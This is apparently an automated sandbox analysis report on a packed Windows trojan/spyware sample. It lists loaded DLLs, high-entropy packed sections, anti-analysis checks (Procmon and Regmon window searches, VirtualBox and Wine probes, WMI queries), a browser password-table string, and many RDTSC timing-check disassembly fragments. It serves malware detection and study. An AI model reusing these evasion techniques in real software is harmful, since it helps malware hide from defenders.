                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_00A58087
                Source: MaZjv5XeQi.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MaZjv5XeQi.exe | Static PE information: Section: ZLIB complexity 0.9995021446078431
                Source: MaZjv5XeQi.exe | Static PE information: Section: buspngqz ZLIB complexity 0.9949199654369081
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@12/3
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134882751.0000000005749000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2135229307.000000000572E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MaZjv5XeQi.exe | ReversingLabs: Detection: 63%
                Source: MaZjv5XeQi.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File read: C:\Users\user\Desktop\MaZjv5XeQi.exe
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Section loaded: version.dll
                Source: MaZjv5XeQi.exe | Static file information: File size 1847808 > 1048576
                Source: MaZjv5XeQi.exe | Static PE information: Raw size of buspngqz is bigger than: 0x100000 < 0x199200

                Data Obfuscation

                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Unpacked PE file: 0.2.MaZjv5XeQi.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;buspngqz:EW;rkbtqtfk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;buspngqz:EW;rkbtqtfk:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: MaZjv5XeQi.exe | Static PE information: real checksum: 0x1d021c should be: 0x1d1ea5
                Source: MaZjv5XeQi.exe | Static PE information: section name:
                Source: MaZjv5XeQi.exe | Static PE information: section name: .idata
                Source: MaZjv5XeQi.exe | Static PE information: section name:
                Source: MaZjv5XeQi.exe | Static PE information: section name: buspngqz
                Source: MaZjv5XeQi.exe | Static PE information: section name: rkbtqtfk
                Source: MaZjv5XeQi.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: MaZjv5XeQi.exe | Static PE information: section name: (empty) entropy: 7.977266846622565
                Source: MaZjv5XeQi.exe | Static PE information: section name: buspngqz entropy: 7.953319540828306

                Boot Survival

                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: B6E0E7 second address: B6E0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: B6E36C second address: B6E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: B6E372 second address: B6E382 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAF831 second address: BAF83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FEB1CC19F76h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8C0 second address: BAC8E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAD948 second address: BAD94E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB084E second address: BB0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9DBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8E5 second address: BAC8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAF83D second address: BAF8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or dword ptr [ebp+1244FA5Eh], edx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov di, ax 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FEB1C7EA9D8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr [ebp+12458033h], ecx 0x0000003f mov eax, dword ptr [ebp+122D0B09h] 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FEB1C7EA9D8h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f jmp 00007FEB1C7EA9DCh 0x00000064 push FFFFFFFFh 0x00000066 jnc 00007FEB1C7EA9DAh 0x0000006c nop 0x0000006d pushad 0x0000006e pushad 0x0000006f pushad 0x00000070 popad 0x00000071 jng 00007FEB1C7EA9D6h 0x00000077 popad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB3747 second address: BB374C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8E9 second address: BAC8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB1881 second address: BB1888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB55DF second address: BB567F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, F36Ch 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov di, dx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FEB1C7EA9D8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jc 00007FEB1C7EA9DCh 0x00000042 xor dword ptr [ebp+122D1954h], eax 0x00000048 mov ebx, dword ptr [ebp+12445D6Ah] 0x0000004e mov eax, dword ptr [ebp+122D0629h] 0x00000054 sub ebx, 787403E4h 0x0000005a add edi, dword ptr [ebp+122D37BCh] 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push ebx 0x00000065 call 00007FEB1C7EA9D8h 0x0000006a pop ebx 0x0000006b mov dword ptr [esp+04h], ebx 0x0000006f add dword ptr [esp+04h], 00000019h 0x00000077 inc ebx 0x00000078 push ebx 0x00000079 ret 0x0000007a pop ebx 0x0000007b ret 0x0000007c nop 0x0000007d jmp 00007FEB1C7EA9E1h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB567F second address: BB5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB5683 second address: BB5687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7503 second address: BB7507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB5687 second address: BB568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7507 second address: BB750D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB750D second address: BB7513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7513 second address: BB7566 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FEB1CC19F78h 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007FEB1CC19F7Ch 0x00000018 popad 0x00000019 nop 0x0000001a cmc 0x0000001b mov dword ptr [ebp+122D2372h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FEB1CC19F78h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d push 00000000h 0x0000003f movzx ebx, dx 0x00000042 push eax 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7566 second address: BB756A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB756A second address: BB756E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB76E1 second address: BB76E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB76E5 second address: BB76F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jns 00007FEB1CC19F76h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE95 second address: BBBE99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE99 second address: BBBE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE9F second address: BBBEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FEB1C7EA9DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBED7E second address: BBED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B5D13C second address: B5D140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2542 second address: BC2550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2550 second address: BC256D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEB1C7EA9D6h 0x0000000e jmp 00007FEB1C7EA9DFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC256D second address: BC257B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FEB1CC19F76h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC26E4 second address: BC26F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jc 00007FEB1C7EA9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2986 second address: BC298A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC298A second address: BC29A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEB1C7EA9D6h 0x00000008 jnp 00007FEB1C7EA9D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007FEB1C7EA9DCh 0x00000016 jno 00007FEB1C7EA9D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC29A6 second address: BC29AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC29AD second address: BC29ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9E7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FEB1C7EA9DCh 0x00000014 pushad 0x00000015 jg 00007FEB1C7EA9D6h 0x0000001b jl 00007FEB1C7EA9D6h 0x00000021 jno 00007FEB1C7EA9D6h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC5EDE second address: BC5EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FEB1CC19F76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC5EF9 second address: BC5EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC13C second address: BCC154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2C3 second address: BCC2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2C7 second address: BCC2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2CD second address: BCC2D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC59F second address: BCC5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC717 second address: BCC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FEB1C7EA9E8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC74B second address: BCC752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCCBBE second address: BCCBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1C7EA9E9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD0791 second address: BD0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AA1 second address: BD5AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AA9 second address: BD5AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AAD second address: BD5ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5ABE second address: BD5AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5C3D second address: BD5C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5C41 second address: BD5C4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60AA second address: BD60BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 ja 00007FEB1C7EA9F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60BA second address: BD60CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FEB1CC19F76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60CC second address: BD60D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6236 second address: BD6244 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5788 second address: BD5795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5795 second address: BD57B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57B2 second address: BD57B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57B8 second address: BD57BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
